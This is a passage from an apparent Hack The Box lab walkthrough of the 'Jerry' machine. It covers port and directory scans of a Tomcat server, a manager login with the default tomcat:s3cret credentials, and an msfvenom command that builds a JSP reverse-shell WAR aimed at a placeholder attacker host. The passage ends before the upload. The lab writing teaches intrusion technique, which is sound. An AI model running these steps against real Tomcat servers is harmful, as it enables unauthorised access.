HTB (Jerry) — Walkthrough

#security #ai #devops #tutorial

Enumeration

nmap -p- 10.129.136.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-22 08:13 CDT
Nmap scan report for 10.129.136.9
Host is up (0.070s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 108.21 seconds

I got back only port 8080 let's dig in more into the port

Service Enumeration - port:8080

nmap -A -p8080 10.129.136.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-22 08:16 CDT
Nmap scan report for 10.129.136.9
Host is up (0.071s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   70.54 ms 10.10.14.1
2   70.77 ms 10.129.136.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.87 seconds

We found that the service running is Tomcat. Let's chek for directories, but first, let's browse to the page.

Now from the webpage, we can confirm the Tomcat version to be Tomcat/7.0.88.

Now our gobuster scan is back:

gobuster dir -u http://10.129.23.21:8080 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,sh,pl,cgi,aspx
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.23.21:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,sh,pl,cgi,aspx,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico          (Status: 200) [Size: 21630]
/host-manager         (Status: 302) [Size: 0] [--> /host-manager/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
Progress: 36912 / 36920 (99.98%)
===============================================================
Finished
===============================================================

When we attemp to check the /manager and /host-manager we hit login wall.

I checked online for default credentials, I found admin:admin. But when I tried admin:admin, I got an error page that changed everything.

The error is a pointer: For example, to add the manager-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed

I decided to try tomcat as the username and s3cret as the password. Like a magic, it worked, we are in.

When loged in, I discovered that I can upload a WAR file, my brain started thinking how to get reverse shell with the file upload.

I created a .war payload with msfvenon:

Exploitation:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f war -o shell.war

The payload is ready, let's upload it. Before the file is uploaded, I started an ncat listerner on my local machine with the port indicated in the msfvenom payload.